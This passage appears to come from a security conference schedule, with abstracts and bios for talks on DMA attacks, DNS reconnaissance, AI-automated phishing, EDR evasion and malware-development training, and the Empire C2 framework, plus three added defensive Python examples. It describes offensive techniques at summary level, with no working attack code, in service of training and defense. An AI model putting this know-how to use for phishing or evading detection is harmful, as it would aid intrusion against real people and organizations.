channel with your real-time medical updates (aka tv medical chart), that are approved by your providers, that are synced to your EHR chart and secured with a personalized pin you created during registration. Upon discharge of the hospital, your channel would be deactivated. 
This would enhance the time from provider-to-patient communication, decrease patient wait times for results, and ensure healthcare treatment transparency. It is optional and on-demand for the patient and family if consent is given by the patient. 5. AI Physiology in Simulation Labs: AI-driven simulated patient models that replicate real-time human physiology, responses to trauma, medication interactions, and disease progression—transforming medical education. 6. Cybersecurity in AI-Driven Emergency Care: Protecting biometric patient data, preventing AI hallucinations and poisoning, and securing AI-driven training systems. By integrating AI-driven biometrics, automating bedside displays and handoff reports, and AI physiology in healthcare, we can prioritize critical patients faster, reduce handoff errors, and accelerate healthcare education. The future of emergency care isn’t just faster, it’s predictive, automated, and cybersecure.
SpeakerBio: Jennifer Schieferle Uhlenbrock
Dr. Jennifer Schieferle Uhlenbrock has 20+ years of healthcare experience. She bridges clinical practice, business, and cybersecurity best practices. A published technical writer and speaker, she translates complex security and patient safety challenges into clear, actionable insights.
DMA vulnerabilities aren't new - but they don't seem to have gone anywhere. In the time software attacks have gone from a single bug to a multi-stage exploit chain, DMA attacks have gone from slipping some hardware into an internal slot of a computer to... plugging in an external device?
Despite decades of attacks, tooling, and even mitigations, most systems are still wide open to these attacks because of their perceived difficulty, poor system configuration, and lack of effective testing mechanisms.
Epic Erebus is a new tool that tries to address these issues. It's small, portable, and easy to use. It can slip through most systems unless the hardware, BIOS, and operating system are all properly configured (a rarity). Finally, it's an entirely open PCIe implementation that gives you full control over Transaction Layer Packets, allowing you to reverse engineer the PCIe bus and the DMA mitigations in place (Get it? RE-Bus... Erebus!)
You should come away understanding what Erebus is capable of, the basics of how to use it, and what to look out for when properly implementing DMA attack mitigations.
Joe FitzPatrick (@securelyfitz) is a Trainer and Researcher at SecuringHardware.com (@securinghw). Joe has spent most of his career working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent decades developing and delivering hardware security related tools and training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.
SpeakerBio: Grace "Baelfire" Parrish
Grace Parrish (@BaelfireNightshd@infosec.exchange) is in her final year of a cybersecurity degree at Oregon State University. Grace has spent much of her career working with industrial control systems but has also dabbled in electrical engineering, FPGAs, microcontrollers, and a quick decade as a board level repair technician. In her spare time as a student, she has served as the team captain for a pentesting competition, has written custom Binary Ninja plugins, and has helped deliver hardware security training at Black Hat. Grace is looking forward to working in the offensive security space once she completes her degree.
As a London-based security researcher with a strong focus on open-source intelligence (OSINT) and attack surface discovery, I am excited to attend the DEF CON conference for the first time and contribute meaningfully to the Red Team Village. My passion lies in developing and refining reconnaissance techniques that enable both offensive and defensive practitioners to gain deeper insights into an organization’s digital footprint.
During the RTV Tactics sessions, I will present a DNS-based OSINT methodology for uncovering products and services through large-scale DNS TXT record scanning. This previously unpublished approach demonstrates how certain TXT records can reveal not just domain ownership or validation details, but also the presence of specific third-party services and platforms in use. For instance, TXT entries like google-site-verification, MS=msXXXXXXXX, or vendor-specific SPF includes can expose dependencies on Google Workspace, Microsoft 365, or other cloud-based services.
By programmatically analyzing these records across large swaths of DNS zones, attackers can construct detailed maps of an organization's technology stack and supply chain affiliations—critical intelligence for targeted campaigns. This intelligence also provides defenders with an opportunity to detect inadvertent information leakage and improve control over external DNS configurations.
To support operational use, I have integrated this scanning technique into widely adopted open-source tools such as Nuclei and Amass. These enhancements allow red teams and security researchers to efficiently incorporate TXT record reconnaissance into broader discovery workflows, elevating the precision and depth of traditional enumeration phases.
This session will equip attendees with practical, reproducible tactics for passive and semi-active discovery that can uncover non-obvious attack vectors. Attendees will leave with actionable insights and tooling that can be immediately applied to real-world engagements.
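The inventory step described above, as an added example that is not the speaker's tooling or the Nuclei/Amass integrations: a small Python audit that runs over a zone's own TXT records (a constructed sample here, with no live DNS queries) and reports the third-party services they imply, so a defender can spot dependency leakage and stale verification tokens before someone else maps them. The vendor tables beyond google-site-verification, MS= and SPF includes, and all function names, are assumptions.

```python
"""Audit what a zone's own TXT records reveal about third-party service use."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample records for a hypothetical zone (not real data).
SAMPLE_TXT_RECORDS = {
    "example.test": [
        "v=spf1 include:_spf.google.com include:spf.protection.outlook.com "
        "include:sendgrid.net ~all",
        "google-site-verification=constructed-token-000",
        "MS=ms00000000",
        "facebook-domain-verification=constructed000",
        "some-unknown-vendor=xyz",          # unrecognised: needs a human look
    ],
    "_dmarc.example.test": ["v=DMARC1; p=none; rua=mailto:dmarc@example.test"],
}

# Verification-token prefixes -> service they imply. The first two are the
# markers named in the abstract; the others are well known but assumed here.
VERIFICATION_PREFIXES = {
    "google-site-verification=": "Google (Search Console / Workspace)",
    "MS=ms": "Microsoft 365",
    "facebook-domain-verification=": "Meta Business",
    "apple-domain-verification=": "Apple Business",
    "atlassian-domain-verification=": "Atlassian",
    "docusign=": "DocuSign",
}

# SPF include targets -> mail service they imply (assumed mapping).
SPF_INCLUDE_VENDORS = {
    "_spf.google.com": "Google Workspace (mail)",
    "spf.protection.outlook.com": "Microsoft 365 (mail)",
    "sendgrid.net": "SendGrid",
    "servers.mcsv.net": "Mailchimp",
    "_spf.salesforce.com": "Salesforce",
}


@dataclass
class Finding:
    name: str               # owner name the TXT record lives under
    detail: str             # the token, include target or policy seen
    service: Optional[str]  # inferred third-party service, None if unknown
    kind: str               # verification | spf-include | spf-policy | dmarc | unknown


def parse_spf(record: str) -> dict:
    """Split a v=spf1 record into include targets, ip blocks and the 'all' qualifier."""
    includes, ips, all_qualifier = [], [], None
    for term in record.split()[1:]:          # skip the 'v=spf1' version tag
        qualifier = "+"                      # SPF default qualifier is pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.startswith("include:"):
            includes.append(term[len("include:"):].lower())
        elif term.startswith(("ip4:", "ip6:")):
            ips.append(term)
        elif term == "all":
            all_qualifier = qualifier
    return {"includes": includes, "ips": ips, "all": all_qualifier}


def classify_txt(name: str, record: str) -> list:
    """Turn one TXT record into one or more findings."""
    lower = record.lower()
    if lower.startswith("v=spf1"):
        spf = parse_spf(record)
        findings = [Finding(name, inc, SPF_INCLUDE_VENDORS.get(inc), "spf-include")
                    for inc in spf["includes"]]
        findings.append(Finding(name, spf["all"] or "missing", None, "spf-policy"))
        return findings
    if lower.startswith("v=dmarc1"):
        m = re.search(r"\bp=(\w+)", record)
        return [Finding(name, m.group(1) if m else "missing", None, "dmarc")]
    for prefix, service in VERIFICATION_PREFIXES.items():
        if record.startswith(prefix):
            return [Finding(name, record, service, "verification")]
    return [Finding(name, record, None, "unknown")]


def inventory(zone: dict) -> dict:
    """Summarise the zone: inferred services plus anything a reviewer should check."""
    summary = {"services": set(), "unknown_includes": [], "unknown_tokens": [],
               "spf_all": None, "dmarc_policy": None}
    for name, records in zone.items():
        for record in records:
            for f in classify_txt(name, record):
                if f.service:
                    summary["services"].add(f.service)
                elif f.kind == "spf-include":
                    summary["unknown_includes"].append(f.detail)
                elif f.kind == "spf-policy":
                    summary["spf_all"] = f.detail
                elif f.kind == "dmarc":
                    summary["dmarc_policy"] = f.detail
                else:
                    summary["unknown_tokens"].append(f.detail)
    return summary


if __name__ == "__main__":
    inv = inventory(SAMPLE_TXT_RECORDS)
    print("Services implied by TXT records:", sorted(inv["services"]))
    print("Unrecognised tokens to review:", inv["unknown_tokens"])
    print("SPF 'all' qualifier:", inv["spf_all"], "| DMARC p=", inv["dmarc_policy"])
```

Feeding the output of a zone export (or a resolver's TXT answers for each owner name) into `inventory` gives the same dependency map an outside observer could build, which is the list to reconcile against the services the organisation actually still uses.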
It would be an absolute honor to support the Red Team Village and give back to a community that has been instrumental in shaping my growth as a researcher. I deeply value the Village’s mission to educate, inspire, and empower red teamers of all experience levels, and I am eager to contribute to that mission by sharing knowledge that enhances our collective offensive capabilities and understanding of adversarial tradecraft. Thank you for the opportunity to be considered.
SpeakerBio: Rishi "rxerium" Chudasama
Rishi Chudasama is a London-based security researcher with over five years of hands-on experience in IT. He currently specializes in vulnerability research, threat intelligence, and enterprise risk analysis. His current focus lies in identifying and analyzing zero-day vulnerabilities and emerging CVEs, often working to reverse engineer exploit mechanics and build detection logic before public weaponization. Rishi’s work spans both offensive and defensive domains—developing threat models based on real-world TTPs, crafting custom detection rules, and automating reconnaissance pipelines to uncover exploitable misconfigurations and exposed assets. He is particularly active in attack surface management (ASM) and OSINT, where he leverages DNS enumeration, passive data correlation, and large-scale infrastructure scanning to surface unknown entry points and map adversary-accessible exposure. Outside of research, Rishi integrates findings into operational tooling and supports data-driven prioritization strategies to bridge technical risk and business impact. His work reflects a deep commitment to adversary-informed defense and proactive discovery across modern hybrid environments.
Effective phishing campaigns traditionally demand extensive manual effort, involving detailed target reconnaissance, crafting believable scenarios, and setting up infrastructure. These manual processes significantly restrict scalability and customization. This talk explores a practical approach to leveraging Generative AI for automating core aspects of phishing workflows, drawing on direct experiences and real-world threat actors such as Emerald Sleet, Crimson Sandstorm, and Charcoal Typhoon.
The session thoroughly compares results from different models and platforms, including OpenAI ChatGPT, Anthropic Claude, and local alternatives, highlighting distinct strengths, weaknesses, and techniques for optimizing outcomes. Attendees will gain insights into deploying an end-to-end phishing campaign, emphasizing the models' effectiveness in reducing the technical barrier of scaling phishing attacks. Finally, the talk underscores that while AI significantly enhances operational efficiency, it functions best when complemented by human judgment and expertise, reinforcing the critical human factor in cybersecurity practices.
SpeakerBio: Daniel Marques
With over 15 years in offensive security, Daniel applies a strong software development and networking background to help Fortune 500 companies identify and remediate vulnerabilities in various technologies, including corporate networks, applications, and smart devices. His offensive security research has been featured at prominent local and international security conferences such as HOU.SEC.CON, ISC2 Security Congress, and Black Hat Regional Summit. Daniel holds a B.Sc. in Computer Science and an M.Sc. in Cybersecurity. In 2019, Daniel was part of the team that won the DEF CON Biohacking Village Capture the Flag competition.
"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.
By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.
* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *
Speakers: Giorgio "gbyolo" Bernardinetti, Dimitri "GlenX" Di Cristofaro
Giorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.
SpeakerBio: Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTD
Dimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.
"Dodging the EDR bullet" Training is an intensive, hands-on course designed to equip cybersecurity professionals with cutting-edge skills in malware evasion techniques. Dive deep into Windows security components, antivirus systems, and EDRs while mastering the full malware lifecycle—from initial access to advanced in-memory evasion and kernel-level persistence. Through a systematic approach to memory management and process manipulation, participants will learn how to bypass modern detection strategies and build stealthy malware components. The course focuses on cultivating a research-driven mindset, enabling attendees to understand and analyze detection strategies provided by the Windows OS and then craft their own techniques to evade them.
By the end of the training, participants will have gained a solid foundation in malware analysis and development, enabling them to craft sophisticated command-and-control (C2) payloads and maintain persistence while remaining undetected.
* All students are expected to sign an NDA with the trainer to avoid unauthorized sharing of training materials *
Speakers:Giorgio "gbyolo" Bernardinetti,Dimitri "GlenX" Di CristofaroGiorgio "gbyolo" Bernardinetti is lead researcher at the System Security division of CNIT. His research activities are geared towards Red Teaming support activities, in particular design and development of advanced evasion techniques in strictly monitored environments, with emphasis on (but not limited to) the Windows OS, both in user-space and kernel-space. He has been a speaker for DEFCON32 Workshops and Red Team Village HacktivityCon 2021.
SpeakerBio: Dimitri "GlenX" Di Cristofaro, Security Consultant and Researcher at SECFORCE LTDDimitri "GlenX" Di Cristofaro is a security consultant and researcher at SECFORCE LTD where he performs Red Teams on a daily basis. The main focus of his research activities is about Red Teaming and in particular on identifying new ways of attacking operating systems and looking for cutting edge techniques to increase stealthiness in strictly monitored environments. He enjoys malware writing and offensive tools development as well as producing electronic music in his free time.
This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.
SpeakerBio: William Giles
William (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.
In the continuously evolving world of browser extensions, security remains a big concern. As the demand for feature-rich extensions increases, priority is given to functionality over robustness, which makes way for vulnerabilities that can be exploited by malicious actors. The danger increases even more for organizations handling sensitive data like banking details, PII, confidential org reports, etc. Damn Vulnerable Browser Extension (DVBE) is an open-source vulnerable browser extension, designed to shed light on the importance of writing secure browser extensions and to educate developers and security professionals about the vulnerabilities and misconfigurations that are found in browser extensions, how they are found, and how they impact business. This built-to-be-vulnerable extension can be used to learn, train, and exploit browser extension-related vulnerabilities.
SpeakerBio: Abhinav Khanna
Abhinav is an information security professional with 6+ years of experience. Having worked at organisations like S&P Global and NotSoSecure, his area of expertise lies in web appsec, mobile appsec, API security, and browser extension security. He has spoken at multiple conferences like Black Hat Asia, Black Hat Europe, and Black Hat MEA. In his free time, he likes playing table tennis.
Dyna is a full-spectrum Android security auditing framework designed to automate the OWASP MASTG checklist using both static and dynamic analysis. Built for red teams, appsec engineers, and mobile researchers, Dyna combines Frida, Drozer, PyGhidra, and ADB-based techniques into a modular pipeline that evaluates app permissions, exported components, crypto misuse, insecure storage, IPC abuse, native binary risks, and reverse engineering resilience. It can detect traversal, SQLi, hardcoded secrets, and debuggable builds, while reverse engineering .so files using Ghidra in headless mode. Dyna also features real-time logcat parsing and deep link/URL extraction to trace third-party leaks and misconfigurations. With colored output, structured reports, and an extensible architecture, Dyna turns OWASP MASTG from a checklist into a powerful automated testing workflow.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Ayodele IbidapoArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Ayodele Ibidapo
Ayodele is a cybersecurity consultant and application penetration tester with over 15 years of experience strengthening enterprise security architecture, risk governance, and secure DevSecOps practices across the finance, telecom, and manufacturing sectors. His expertise spans mobile, web, and containerized applications, where he has developed taint flow analyzers, automated vulnerability discovery workflows, and built custom static and dynamic analysis tools to uncover complex security flaws. He holds a Master's in Information Systems Security Management from Concordia University of Edmonton and a B.Eng. from the University of Portsmouth. His research on CVSS v2 environmental scoring was presented at an IEEE international conference at MIT, and he continues to bridge deep technical testing with strategic design to deliver resilient, risk-informed solutions.
EFF's team of technology experts have crafted challenging trivia about the fascinating, obscure, and trivial aspects of digital security, online rights, and Internet culture. Competing teams will plumb the unfathomable depths of their knowledge, but only the champion hive mind will claim the First Place Tech Trivia Badge and EFF swag pack. The second and third place teams will also win great EFF gear.
No prerequisites! Just a desire to have fun and come answer some trivia questions. Participants will need to join a team which they can create beforehand or join one ad-hoc during the event!
None
Traditional patching has failed to scale; it is time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you'll learn how Content Security Policy Level 3, Trusted Types, and the Fetch Metadata request headers (Sec-Fetch-Site, Sec-Fetch-Mode, Sec-Fetch-Dest) go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.
You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.
This isn't just about fixing issues; it's about scaling security across an organization. We'll explore measuring adoption across hundreds of services, automating enforcement, and applying defense in depth beyond single vulnerabilities.
Through interactive group challenges, you'll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you're a developer, security engineer, or architect, you'll leave with practical tools and a proactive security mindset, moving from patching to prevention.
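The three mechanisms the workshop covers compose on the server side into two decisions per response: whether to serve a request at all, based on the Fetch Metadata headers the browser attaches, and which Content-Security-Policy to send, with a per-response nonce and Trusted Types enforcement. The following is an added example written for this page, not the workshop's training app; the request headers it checks are constructed, and its isolation rule is deliberately stricter than the commonly published reference policy in that it also refuses cross-site framing.

```python
"""Fetch Metadata resource isolation plus a strict, nonce-based CSP Level 3
header with Trusted Types. Added example, not the workshop's training app."""
import secrets

# Cross-site navigations are allowed only when they land in a top-level document;
# refusing "iframe"/"frame"/"embed"/"object" blocks cross-site framing as well.
NAVIGATION_DESTS = {"document"}


def resource_isolation_allows(headers, method):
    """Resource Isolation Policy: decide whether a request may be served.

    Allow same-origin / same-site / user-initiated requests, browsers that send
    no Fetch Metadata, and plain top-level navigations. Deny every other
    cross-site request (subresource loads, fetch()/XHR, form POSTs, framing),
    which removes CSRF, XSSI and cross-site-leak classes in one place.
    """
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is None:
        return True  # legacy browser without Fetch Metadata: rely on other defenses
    if site in ("same-origin", "same-site", "none"):
        return True
    # Cross-site: permit only a GET/HEAD navigation into a top-level document.
    return (method in ("GET", "HEAD")
            and h.get("sec-fetch-mode") == "navigate"
            and h.get("sec-fetch-dest") in NAVIGATION_DESTS)


def new_nonce():
    """Fresh, unguessable nonce per response (never reuse across responses)."""
    return secrets.token_urlsafe(16)


def build_csp(nonce, report_only=False):
    """Strict CSP: only scripts carrying this response's nonce run, and
    'strict-dynamic' lets them load further scripts without host allowlists.
    'require-trusted-types-for' makes DOM sinks such as innerHTML reject plain
    strings unless the registered 'app' policy produced them. The https: and
    'unsafe-inline' fallbacks are ignored by CSP3 browsers once a nonce is seen.
    """
    policy = "; ".join([
        f"script-src 'nonce-{nonce}' 'strict-dynamic' https: 'unsafe-inline'",
        "object-src 'none'",
        "base-uri 'none'",
        "require-trusted-types-for 'script'",
        "trusted-types app",
    ])
    name = "Content-Security-Policy-Report-Only" if report_only else "Content-Security-Policy"
    return name, policy


def handle_request(request_headers, method, report_only=False):
    """Middleware shape: (status, response_headers, nonce_for_templates)."""
    if not resource_isolation_allows(request_headers, method):
        return 403, {}, None
    nonce = new_nonce()
    name, policy = build_csp(nonce, report_only=report_only)
    return 200, {name: policy}, nonce


if __name__ == "__main__":
    # Constructed cross-site fetch() such as an XSSI/CSRF attempt from another origin.
    attack = {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty"}
    print(handle_request(attack, "POST")[0])            # 403
    print(handle_request({}, "GET", report_only=True))  # 200 with a report-only policy
```

Rolling the policy out as Report-Only first is how adoption gets measured across many services: every service emits the same header shape, violation reports show which ones still break, and enforcement is flipped per service once the reports go quiet. The nonce must be generated per response and threaded into every inline `<script nonce>` tag by the template layer; a nonce that is static or cached is equivalent to `'unsafe-inline'`.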
SpeakerBio: Javan Rasokat, Application Security Architect and Security Researcher
Javan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures on Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, when he started automating online games with bots and identified security bugs, which he then reported to the game operators. Javan turned his interests into his profession, beginning as a full-stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master's degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences including OWASP Global AppSec, DEF CON, and HITB.
Empire 6.0 is the latest evolution of the Command and Control (C2) framework. This major release introduces powerful new capabilities, including Go-based agents for enhanced cross-platform compatibility, a completely overhauled Empire compiler for streamlined payload deployment, and an integrated plugin marketplace in Starkiller. Enhanced module systems, dynamic option handling, Beacon Object File integration, and advanced remote script execution further expand Empire's capabilities. Empire continues to provide cryptographically secure communications and direct integration with the MITRE ATT&CK framework to emulate real-world Advanced Persistent Threat tactics, techniques, and procedures. This demo lab will highlight these significant advancements and demonstrate Empire 6.0's state-of-the-art capabilities.
Speakers: Vincent "Vinnybod" Rose, Jake "Hubble" Krasnov
SpeakerBio: Vincent "Vinnybod" Rose
Vincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC Security
Jake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
EntraGoat is a deliberately vulnerable environment designed to simulate real-world security misconfigurations and attack scenarios in Microsoft Entra ID (formerly Azure Active Directory). Security professionals, researchers, and red teamers can leverage EntraGoat to gain hands-on experience identifying and exploiting identity and access management vulnerabilities, privilege escalation paths, and other security flaws specific to cloud-based Entra ID environments. EntraGoat is tailored specifically to help security practitioners understand and mitigate the risks associated with cloud identity infrastructures. The project provides a CTF-style learning experience, covering a range of misconfigurations, insecure policies, token abuses, and attack paths commonly exploited in real-world Entra ID breaches. By using EntraGoat, security teams can enhance their skills in Entra ID security, validate detection and response capabilities, and develop effective hardening strategies.
Speakers: Tomer Nahum, Jonathan Elkabas
SpeakerBio: Tomer Nahum
Tomer is a security researcher at Semperis, where he works to find new attacks, and how to defend against them, in on-prem identity stacks such as Active Directory as well as in cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by the Microsoft Security Response Center (MSRC).
SpeakerBio: Jonathan Elkabas
Jonathan is a security researcher at Semperis, specializing in Entra ID and Active Directory security. With expertise in identity-based threats, he focuses on analyzing attack techniques, developing detection strategies, and enhancing defenses against evolving cyber threats. He actively contributes to the security community through research, threat intelligence sharing, and speaking engagements.
Feet Feud (Hacker Family Feud) is a Cybersecurity-themed Family Feud style game arranged by members of the OnlyFeet CTF team and hosted by Toeb3rius (aka Tib3rius). Both survey questions and their answers are crowd-sourced from the Cybersecurity community. Two teams (Left Foot and Right Foot) captained by Ali Diamond and John Hammond and comprised of audience members go head to head, trying to figure out the top answers to the survey questions.
Attendees can either watch the game or volunteer to play on one of the two teams. Audience participation is also encouraged if either of the two teams fails to get every answer of a survey question.
Ultimately Feet Feud is about having a laugh, watching people in the industry attempt to figure out what randomly surveyed people from the Cybersecurity community put as answers to a number of security / tech related questions.
Participants are chosen by team captains from the audience at the start of the show. In order to be fair, we try to select participants from all seating areas, so folks who show up later than others still have a chance to volunteer.
None.
Maritime vessel controls and operational technology (OT) systems are becoming more complex and interconnected. With industry trends aiming to reduce crew, automate tasks, and improve efficiency, these networks are growing in scale, intricacy, and criticality for vessel operation and maintenance. The standard controller area network (CAN) bus protocol for maritime vessel networks, developed by the National Marine Electronics Association (NMEA), is NMEA2000. NMEA2000 is an application-layer protocol built on ISO 11783 and compatible with automotive SAE J1939; it uses unique message identifiers, known as Parameter Group Numbers (PGNs), to define the data carried in each frame. Despite its widespread use, NMEA2000 remains a relatively unexplored domain, particularly with respect to what normal versus abnormal network behavior looks like, because no open-source datasets are available. To address this gap, we constructed an NMEA2000 system of five nodes, including a GPS/radar unit, a wind speed/direction sensor, and a multifunction display. Using this setup, we collected datasets to analyze system behavior and developed deterministic fingerprints for each sensor, establishing a baseline of normal operation. We then subjected the system to controlled attacks to evaluate the accuracy and effectiveness of the fingerprints. This work is a foundational step towards improving the security and reliability of maritime OT systems.
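Two things in the abstract can be shown concretely: how the PGN, priority and source address are unpacked from the 29-bit CAN identifier that NMEA2000 inherits from J1939, and how a per-sensor timing fingerprint turns a capture into a baseline that flags injected or spoofed frames. The following is an added example written for this page, not the authors' code or dataset; the frames are constructed (a GPS at source address 0x23 and a wind sensor at 0x10, each broadcasting at its standard rate), and the 50% period tolerance is an assumption rather than a value from the talk.

```python
"""Decode NMEA2000 / J1939 29-bit CAN identifiers and fingerprint sensors by
their transmit period. Added example; frames below are constructed."""
from collections import defaultdict
from statistics import median


def decode_can_id(can_id):
    """Split a 29-bit identifier into priority, PGN, source and destination.

    Layout (J1939-21): priority[28:26] reserved[25] data_page[24]
    pdu_format[23:16] pdu_specific[15:8] source[7:0]. For PDU1 (PF < 240) the
    PS byte is a destination address; for PDU2 (PF >= 240) it extends the PGN.
    """
    priority = (can_id >> 26) & 0x7
    reserved = (can_id >> 25) & 0x1
    data_page = (can_id >> 24) & 0x1
    pdu_format = (can_id >> 16) & 0xFF
    pdu_specific = (can_id >> 8) & 0xFF
    source = can_id & 0xFF
    pgn = (reserved << 17) | (data_page << 16) | (pdu_format << 8)
    if pdu_format >= 240:
        pgn |= pdu_specific
        destination = 0xFF  # broadcast
    else:
        destination = pdu_specific
    return {"priority": priority, "pgn": pgn, "source": source, "destination": destination}


def learn_fingerprints(frames):
    """frames: iterable of (timestamp_seconds, can_id).
    Returns {(source, pgn): median inter-arrival interval} for the capture."""
    last, gaps = {}, defaultdict(list)
    for ts, cid in frames:
        d = decode_can_id(cid)
        key = (d["source"], d["pgn"])
        if key in last:
            gaps[key].append(ts - last[key])
        last[key] = ts
    return {k: median(v) for k, v in gaps.items() if v}


def detect_anomalies(frames, fingerprints, tolerance=0.5):
    """Flag a (source, PGN) pair never seen in the baseline (spoofed node), or a
    frame arriving at less than `tolerance` of its learned period (injection)."""
    last, alerts = {}, []
    for ts, cid in frames:
        d = decode_can_id(cid)
        key = (d["source"], d["pgn"])
        if key not in fingerprints:
            alerts.append((ts, key, "unknown source/PGN pair"))
        elif key in last and (ts - last[key]) < tolerance * fingerprints[key]:
            alerts.append((ts, key, "period too short"))
        last[key] = ts
    return alerts


# Constructed identifiers: priority 2, data page 1 (as for PGNs >= 65536).
GPS_POS = 0x09F80123   # PGN 129025 Position, Rapid Update, from source 0x23
GPS_COG = 0x09F80223   # PGN 129026 COG & SOG, Rapid Update, from source 0x23
WIND = 0x09FD0210      # PGN 130306 Wind Data, from source 0x10


def baseline_frames(seconds=5):
    """Constructed clean capture: position and wind at 10 Hz, COG/SOG at 4 Hz."""
    frames = []
    for i in range(int(seconds / 0.1)):
        frames.append((round(i * 0.1, 3), GPS_POS))
        frames.append((round(i * 0.1 + 0.02, 3), WIND))
    for i in range(int(seconds / 0.25)):
        frames.append((round(i * 0.25 + 0.05, 3), GPS_COG))
    return sorted(frames)


def attack_frames():
    """Constructed attack capture: one injected position frame 10 ms after a real
    one, and one position frame from a source address (0x7E) never seen before."""
    frames = baseline_frames(2)
    frames.append((1.01, GPS_POS))
    frames.append((1.5, 0x09F8017E))
    return sorted(frames)


if __name__ == "__main__":
    fp = learn_fingerprints(baseline_frames())
    for ts, key, why in detect_anomalies(attack_frames(), fp):
        print(f"t={ts:.2f}s src=0x{key[0]:02X} pgn={key[1]}: {why}")
```

The fingerprint here is timing only, which is what a node can be held to even when frame contents are plausible; a spoofed position whose values look sane still lands at the wrong cadence or from the wrong source address. Real captures will need per-PGN tolerances (some NMEA2000 messages are sent on change rather than on a fixed period) and a baseline long enough for the median to settle.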
Speakers: Constantine Macris (TheDini), Anissa Elias
SpeakerBio: Constantine Macris (TheDini)
Constantine Macris is a Connecticut native pursuing a PhD at URI. Constantine is a reserve CDR in the Navy, an industry expert in OT and network security, and CISO at Dispel.
SpeakerBio: Anissa Elias, University of Rhode Island
